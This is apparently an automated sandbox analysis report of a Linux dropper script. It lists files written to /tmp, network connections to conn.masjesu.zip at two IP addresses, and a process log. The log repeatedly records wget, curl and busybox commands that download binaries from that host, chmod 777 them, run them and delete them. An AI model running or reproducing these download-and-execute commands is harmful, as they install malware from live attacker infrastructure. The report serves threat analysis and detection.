| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/chmod
[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/rm
[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/chmod
[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2
[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/rm
[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/chmod
[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5
[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/rm
[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/chmod
[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb
[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/rm
[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/chmod
[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8
[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/rm
[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/chmod
[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q
[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/rm
[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/chmod
[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL
[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/rm
[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/chmod
[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz
[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/rm
[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/chmod
[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8
[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/rm
[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/chmod
[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q
[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/rm
[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/chmod
[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh
[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/rm
[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/chmod
[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ
[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/rm
[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/chmod
[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3
[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/rm
[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/chmod
[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza
[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/rm
[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/chmod
[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz
[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/rm
[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/chmod
[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8
[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/rm
[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/chmod
[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q
[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/rm
[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/chmod
[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh
[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/rm
[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/chmod
[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ
[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/rm
[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/chmod
[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3
[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/rm
[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/chmod
[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza
[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/rm
[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/chmod
[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/rm
[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/chmod
[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2
[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/rm
[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/chmod
[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5
[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/rm
[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/chmod
[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb
[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/rm
[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/chmod
[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8
[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/rm
[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/chmod
[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q
[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/rm
[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/chmod
[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL
[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/rm
[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
